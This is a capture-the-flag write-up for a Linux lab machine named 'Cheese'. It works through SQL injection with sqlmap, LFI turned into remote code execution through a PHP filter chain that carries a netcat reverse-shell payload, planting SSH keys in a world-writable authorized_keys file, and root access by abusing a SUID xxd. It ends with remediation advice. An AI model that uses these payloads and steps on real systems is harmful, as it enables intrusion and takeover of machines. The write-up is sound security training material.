Target IP: cheese.thm (Requires /etc/hosts entry) Difficulty: Medium/Hard Objective: User (user.txt) & Root (root.txt) Flags

1. Executive Summary

“Cheese” is a Linux machine that requires chaining multiple distinct vulnerability classes. Initial discovery involves bypassing a login panel via SQL Injection to uncover a hidden administrative script. This script contains a Local File Inclusion (LFI) vulnerability, which is escalated to Remote Code Execution (RCE) using advanced PHP Filter Chain exploitation. Lateral movement leverages poor file permissions on an SSH configuration. Root access is achieved by abusing a custom Systemd Timer which creates a SUID binary (xxd), allowing arbitrary file writes to the root directory.

Key TTPs (MITRE ATT&CK):

  • T1190 (Exploit Public-Facing App): SQL Injection on login.
  • T1059.006 (Python): Using PHP Filter Chain Generator tool.
  • T1098 (Account Manipulation): Adding keys to authorized_keys.
  • T1543 (Create or Modify System Process): Abusing Systemd Timers.
  • T1548 (Abuse Elevation Control Mechanism): Exploiting SUID binary (xxd).

2. Operational Setup

Host Configuration

echo "10.10.x.x cheese.thm" | sudo tee -a /etc/hosts

3. Enumeration

A. Network Scanning

Nmap reveals many open ports (likely rabbit holes/teapots) and a web server.

nmap -sC -sV -oA nmap/cheese cheese.thm

B. Web Enumeration

  • Login Page: http://cheese.thm/login.php
  • Fuzzing: Directory fuzzing reveals typical PHP structure but the login page is the primary gate.

4. Initial Access Phase 1: The SQL Injection

Standard credential stuffing failed. You correctly identified that sqlmap is the tool of choice here.

The Technique: SQLMap via Request File Instead of typing long URL parameters, saving the raw HTTP request from Burp Suite is professional and efficient.

  1. Capture: Intercept the login POST request in Burp Suite.
  2. Save: Right-click -> “Copy to file” -> login.req.
  3. Exploit:
sqlmap -r login.req --level=2 --risk=2 --batch

Result: SQLMap triggers a 302 Redirect to a hidden endpoint: http://cheese.thm/secret-script.php?file=supersecretadminpanel.html


5. Initial Access Phase 2: LFI to RCE (PHP Filter Chains)

The Vulnerability

The URL secret-script.php?file=... screams Local File Inclusion (LFI).

  • Check: ?file=php://filter/convert.base64-encode/resource=index.php (Standard LFI test).
  • Check: ?file=/etc/passwd (Verifies read access).

The Exploit: PHP Filter Chains

Standard LFI lets you read files. But we want to execute code. In modern PHP environments without file upload, PHP Filter Chains are the magic bullet. They abuse PHP’s stream filters to generate arbitrary characters, essentially allowing you to “write” a webshell into memory and execute it, purely via the GET parameter.

1. Generate Payload: Using synacktiv/php_filter_chain_generator:

python3 php_filter_chain_generator.py --chain '<?php system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.YOUR.IP 4444 >/tmp/f"); ?>' | grep '^php' > payload.txt

2. Execute:

# Setup listener
nc -lvnp 4444
 
# Fire payload
curl -s "http://cheese.thm/secret-script.php?file=$(cat payload.txt)"

Status: Shell as www-data.


6. Lateral Movement: Writable SSH Keys

Enumeration

Running standard enumeration (or linpeas.sh) reveals a critical misconfiguration.

ls -la /home/comte/.ssh/authorized_keys
# -rw-rw-rw- 1 comte comte ... authorized_keys

The file is world-writable.

Exploitation

  1. Generate Key: ssh-keygen -f id_ed25519 (on attacker machine).
  2. Inject Key:
echo "ssh-ed25519 AAAAC3Nz..." >> /home/comte/.ssh/authorized_keys
  1. Login: ssh -i id_ed25519 comte@cheese.thm.

Status: User comte.


7. Privilege Escalation: Systemd & SUID xxd

Enumeration

Checking sudo privileges:

sudo -l
# (ALL) NOPASSWD: /bin/systemctl start exploit.timer
# (ALL) NOPASSWD: /bin/systemctl enable exploit.timer
...

Checking the associated service file:

cat /etc/systemd/system/exploit.service

Content:

[Service]
Type=oneshot
ExecStart=/bin/bash -c "/bin/cp /usr/bin/xxd /opt/xxd && /bin/chmod +sx /opt/xxd"

The Logic Flaw

  1. The user comte cannot edit exploit.service (it is immutable).
  2. However, comte can start the exploit.timer via sudo.
  3. When the timer starts, it triggers exploit.service.
  4. exploit.service copies the binary xxd to /opt/xxd and sets the SUID bit (chmod +s).

Exploitation (GTFOBins)

1. Trigger the SUID Creation:

sudo /bin/systemctl start exploit.timer
# Verify
ls -la /opt/xxd
# -rwsr-sr-x 1 root root ... /opt/xxd

2. Abusing xxd: xxd is a hex dump tool. If it runs as SUID root, it can read any file and write any file. We use it to overwrite the root user’s SSH keys.

The Command:

# echo "YOUR_PUBLIC_KEY" | xxd | /opt/xxd -r - /root/.ssh/authorized_keys
echo 'ssh-ed25519 AAAAC3Nz...' | xxd | /opt/xxd -r - /root/.ssh/authorized_keys
  • xxd (first one): Converts your key text into hex dump format.
  • /opt/xxd -r (SUID one): Reverts the hex dump back to binary/text and writes it to the target file (- means read from stdin).

3. Root Access:

ssh -i id_ed25519 root@cheese.thm

Root Flag: /root/root.txt


8. Remediation (Blue Team)

  1. Input Sanitization: Implement prepared statements to prevent SQL Injection on the login form.
  2. LFI Mitigation: Validate the file parameter against a whitelist of allowed files. Do not pass user input directly to include() or require().
  3. File Permissions:
  • authorized_keys should be 600 (Read/Write by owner only).
  • Systemd service files executed by root should not create SUID binaries in public directories (/opt).
  1. Sudo Principle of Least Privilege: Do not grant systemctl permissions to users unless strictly necessary, as it often leads to root escalation.